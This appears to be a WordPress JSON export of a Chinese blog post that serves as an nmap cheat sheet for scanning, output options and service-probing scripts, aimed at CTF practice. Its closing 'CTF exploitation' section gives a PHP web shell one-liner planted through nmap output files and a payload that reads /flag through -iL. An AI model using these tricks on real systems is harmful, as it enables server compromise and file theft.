{"id":46,"date":"2026-03-14T22:30:57","date_gmt":"2026-03-14T14:30:57","guid":{"rendered":"http:\/\/47.118.30.30\/?p=46"},"modified":"2026-03-15T11:40:56","modified_gmt":"2026-03-15T03:40:56","slug":"nmap","status":"publish","type":"post","link":"https:\/\/arknight.wiki\/index.php\/2026\/03\/14\/nmap\/","title":{"rendered":"nmap"},"content":{"rendered":"<h1>nmap<\/h1>\n<h2>\u57fa\u672c\u7528\u6cd5\uff1a<\/h2>\n<p>\u57fa\u7840\u626b\u63cf\uff1a<\/p>\n<pre><code>nmap &lt;target&gt;<\/code><\/pre>\n<p>\u57fa\u7840\u626b\u63cf\uff08\u9ed8\u8ba41000\u7aef\u53e3\uff09<\/p>\n<p>\u5168\u7aef\u53e3\u626b\u63cf\uff1a<\/p>\n<pre><code>nmap -p- &lt;target&gt;<\/code><\/pre>\n<p><strong>\u670d\u52a1\u4e0e\u7248\u672c\u63a2\u6d4b<\/strong>\uff1a<\/p>\n<pre><code>nmap -sV &lt;target&gt;<\/code><\/pre>\n<p><strong>\u64cd\u4f5c\u7cfb\u7edf\u8bc6\u522b<\/strong>\uff1a<\/p>\n<pre><code>nmap -O &lt;target&gt;<\/code><\/pre>\n<p><strong>Ping \u626b\u63cf\uff08\u4e3b\u673a\u53d1\u73b0\uff09<\/strong>\uff1a<\/p>\n<pre><code>nmap -sn &lt;subnet&gt;<\/code><\/pre>\n<p><strong>\u4fdd\u5b58\u626b\u63cf\u7ed3\u679c\u548c\u547d\u4ee4<\/strong>\uff1a<\/p>\n<pre><code>nmap -oN output.txt -oX output.xml &lt;target&gt;\nnmap -p- -sV &lt;target&gt; | grep \"open\"\n\/\/\u7ed3\u5408 grep\/awk \u63d0\u53d6\u5173\u952e\u4fe1\u606f\n\n\u53c2\u6570\n-oN\uff1a\u6807\u51c6\u53ef\u8bfb\u6587\u672c\u683c\u5f0f\uff08\u4eba\u7c7b\u53cb\u597d\uff09\n\/\/nmap -oN scan.txt target\n-oX\uff1aXML \u683c\u5f0f\uff08\u7ed3\u6784\u5316\uff0c\u9002\u5408\u7a0b\u5e8f\u89e3\u6790\uff09\n\/\/nmap -oX scan.xml target\n-oG\uff1aGrep \u53cb\u597d\u683c\u5f0f\uff08\u5df2\u5f03\u7528\u4f46\u90e8\u5206\u4eba\u4ecd\u7528\uff09\n\/\/nmap -oG scan.gnmap target\n-oA\uff1a\u540c\u65f6\u8f93\u51fa\u4e09\u79cd\u683c\u5f0f\uff08.nmap, .xml, .gnmap\uff09\n\/\/nmap -oA fullscan target\n\n--append-output\n\/\/\u8ffd\u52a0\u5230\u5df2\u5b58\u5728\u7684\u8f93\u51fa\u6587\u4ef6\uff08\u9ed8\u8ba4\u662f\u8986\u76d6\uff09\n--resume &lt;filename&gt;\n\/\/\u6062\u590d\u4e2d\u65ad\u7684\u626b\u63cf\uff08\u4ec5\u5bf9 -oA\/-oN\/-oX \u6709\u6548\uff09\n-v \/ -vv\n\/\/\u589e\u52a0\u8f93\u51fa\u8be6\u7ec6\u7a0b\u5ea6\uff08\u4e5f\u4f1a\u5199\u5165\u6587\u4ef6\uff09\n--reason\n\/\/\u5728\u8f93\u51fa\u4e2d\u5305\u542b\u7aef\u53e3\u72b6\u6001\u5224\u5b9a\u539f\u56e0\uff08\u5982 \"syn-ack\"\uff09<\/code><\/pre>\n<p>\u5176\u4ed6\u670d\u52a1\u63a2\u6d4b\uff1a<\/p>\n<pre><code>\u9690\u85cf Web \u670d\u52a1\uff1anmap -p- -sV\n\/\/\u53d1\u73b0 8080\u30018000 \u7b49\u7aef\u53e3\u4e0a\u7684 Web\nFTP \u533f\u540d\u767b\u5f55\uff1anmap --script=ftp-anon\n\/\/\u4e0b\u8f7d flag\nRedis \u672a\u6388\u6743\u8bbf\u95ee\uff1anmap --script=redis-info\n\/\/\u5229\u7528\u5199 SSH key \u6216 Web \u76ee\u5f55\nSMB \u5171\u4eab\u6cc4\u9732\uff1anmap --script=smb-enum-shares\n\/\/\u83b7\u53d6\u5171\u4eab\u6587\u4ef6\u4e2d\u7684 flag\nHTTP \u8def\u5f84\u6cc4\u9732\uff1anmap --script=http-enum\n\/\/\u627e\u5230 \/flag.php\u3001\/backup.zip\nUDP \u670d\u52a1\u6cc4\u9732\uff1anmap -sU -p 161\n\/\/SNMP \u83b7\u53d6\u654f\u611f\u4fe1\u606f<\/code><\/pre>\n<h2>ctf\u5229\u7528\uff1a<\/h2>\n<p>\u4e9bshell<\/p>\n<pre><code>&lt;?php @eval($_POST[1]);&gt; -oN a.phtml<\/code><\/pre>\n<p>\u8bfb\u6587\u4ef6\u5e76\u8f93\u51fa\uff1a<\/p>\n<pre><code>-iL \u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9\uff0c\u4ee5\u6587\u4ef6\u5185\u5bb9\u4f5c\u4e3a\u641c\u7d22\u76ee\u6807\n-o \u8f93\u51fa\u5230\u6587\u4ef6 \nnmap -iL ip_target.txt -o result.txt\n\u626b\u63cfip_target.txt\u5185\u5305\u542b\u7684ip\u5730\u5740\uff0c\u8f93\u51fa\u626b\u63cf\u7ed3\u679c\u81f3result.txt\n\npayload\uff1anmap 127.0.0.1 -iL \/flag -o haha<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>nmap \u57fa\u672c\u7528\u6cd5\uff1a \u57fa\u7840\u626b\u63cf\uff1a nmap &lt;target&gt; \u57fa\u7840\u626b\u63cf\uff08\u9ed8\u8ba41000\u7aef\u53e3\uff09 \u5168\u7aef\u53e3 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-46","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/46","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/comments?post=46"}],"version-history":[{"count":1,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/46\/revisions"}],"predecessor-version":[{"id":59,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/46\/revisions\/59"}],"wp:attachment":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/media?parent=46"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/categories?post=46"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/tags?post=46"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}